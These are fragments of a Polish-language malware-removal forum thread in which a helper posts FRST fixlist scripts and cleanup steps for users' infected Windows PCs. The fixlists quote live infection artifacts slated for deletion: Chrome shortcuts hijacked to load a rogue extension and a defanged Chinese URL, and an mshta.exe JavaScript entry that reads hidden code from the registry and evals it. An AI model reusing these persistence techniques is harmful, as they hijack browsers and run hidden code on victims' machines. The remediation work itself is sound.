\Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku Task: {DB46AF3B-CD20-4CE1-B420-50D283D1D72F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku Task: {E5497EEF-5859-4C2A-BC2F-CD0F6E8778C6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {F326D667-20DB-499D-9B1C-015764E9FD98} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku WMI_ActiveScriptEventConsumer_ASEC: ShortcutWithArgument: C:\Users\Flymar\Desktop\chrome.exe — skrót.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Flymar\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ ShortcutWithArgument: C:\Users\Flymar\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Flymar\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Flymar\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://fanli90.cn/ C:\Users\Flymar\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk AlternateDataStreams: C:\ProgramData\TEMP:966F7784 [2400] Winlogon\Notify\WB: D:\PROGRA~3\Stardock\OBJECT~1\WINDOW~1\fast64.dll [X] HKLM\...\Policies\Explorer: [ForceActiveDesktopOn] 0 HKLM\...\Policies\Explorer: [NoActiveDesktop] 1 HKLM\...\Policies\Explorer: [NoActiveDesktopChanges] 1 HKLM\...\Policies\Explorer: [NoRecentDocsHistory] 0 HKU\S-1-5-21-548108095-2263111280-3268851415-1000\...\Policies\Explorer: [NoDriveTypeAutoRun] 145 SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - Brak pliku SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - Brak pliku ShellExecuteHooks: Brak nazwy - {62B8A4F4-DE3C-11E6-A1B0-64006A5CFC23} - C:\Users\Flymar\AppData\Roaming\Dulary\Gheperent.dll -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm StartMenuInternet: Google Chrome - "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" U3 idsvc; Brak ImagePath 2017-01-23 23:41 - 2017-01-23 23:41 - 0140288 _____ () C:\Users\Flymar\AppData\Roaming\Installer.dat C:\ProgramData\hash.dat DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Flymar\AppData\Local\Mozilla C:\Users\Flymar\AppData\Roaming\Mozilla C:\Users\Flymar\AppData\Roaming\Profile Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 5. Pobierz AdwCleaner uruchom go i kliknij szukaj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

1. Wszystkie detekcje z HitmanPro daj do usuwania. 2. Dostarcz zaległy raport ze skanowanie AdwCleaner i zrób nowe raporty FRST, powiedz mi jeszcze czy udało Ci się przywodzić pkt. 1?

W takim razie kończymy. Usuń narzędzia diagnostyczno / dezynfekcyjne (są często aktualizowane, więc jednorazowe) - KLIK.

Dałeś raport AdwCleaner'a świadczący o tym, że wykryte przez niego zagrożenia nie zostały usunięcie. Abym miał jasność sytuacji wykryte zagrożenia możesz skasować, a następnie dostarcz z tego raport. Nie zapomnij również o wykonaniu nowego zestawu raportów FRST.

1. Wszystkie wykryte przez MBAM zagrożenia daj do kasacji. 2. Podsumuj obecny stan systemu, czy Avast nadaj krzyczy komunikatami itd.

Ja również nie mam ochoty widzieć Cię kolejny raz w tym dziale

Zobacz na instrukcję pod skryptem.

Tak, już poprawiłem. Tak to jest, kiedy obsługujesz tyle tematów na raz - można się łatwo pomylić.

W systemie widoczne aktywne infekcje, zdolne to prowokowania Avasta, aby dawał właśnie takie komunikaty. 1. Przez panel sterowania odinstaluj zbędnik Akamai NetSession Interface. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Run: [*qguc] => "C:\Users\Pyko\AppData\Local\ebbf8ed\05dc13c.bat" C:\Users\Pyko\AppData\Local\ebbf8ed HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [HideSCAVolume] 0 HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2017-01-20] () GroupPolicy: Ograniczenia - Chrome SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X] S3 cpuz130; Brak ImagePath S3 cpuz138; \??\C:\Users\Pyko\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] 2015-07-28 13:01 - 2015-07-28 13:01 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsj1837.tmp 2015-07-28 12:42 - 2015-07-28 12:42 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsm9B15.tmp Task: C:\Windows\Tasks\HBbRNMacN17uyL5.job => C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe AlternateDataStreams: C:\ProgramData\TEMP:890CC2F3 [127] AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [148] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\590818e: "C:\Windows\system32\mshta.exe" "javascript:kZo9vd3="H8Bjlqyl";Av4=new ActiveXObject("WScript.Shell");X9mtDuT="ZJMp";CfUA68=Av4.RegRead("HKCU\\software\\bszlfymfbs\\wtsnpduowt");UdftsN5="AUv";eval(CfUA68);qec99S="n1vQ9W";" DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. W AdwCleaner po skanie, w pasku Opcje zaznacz Reset zasad IE, a następnie kliknij w Oczyść. 4. Przeprowadź pełen skanowanie systemu za pomocą programu Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Dobra wiadomość, poniższe kroki wykonaj już w trybie normalnym. 1. Wszystkie wykryte zagrożenia przez MBAM daj do kasacji. 2. Uruchom przeglądarkę Google Chrome: Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wyszukiwarkę Ask. 3. Podsumuj obecny stan systemu, czy coś się nie pogorszyło itd.

Brakuje raportu Addition - uzupełnij.

Wybierz poprawną opcję skanowanie, ale coś nie pyka. Przeinstalować oraz zaktualizować MBAM, a następnie wykonaj skan jeszcze raz. Jeśli to nie przyniesie żadnych rezultatów to przeskanujesz system programem HitmanPro.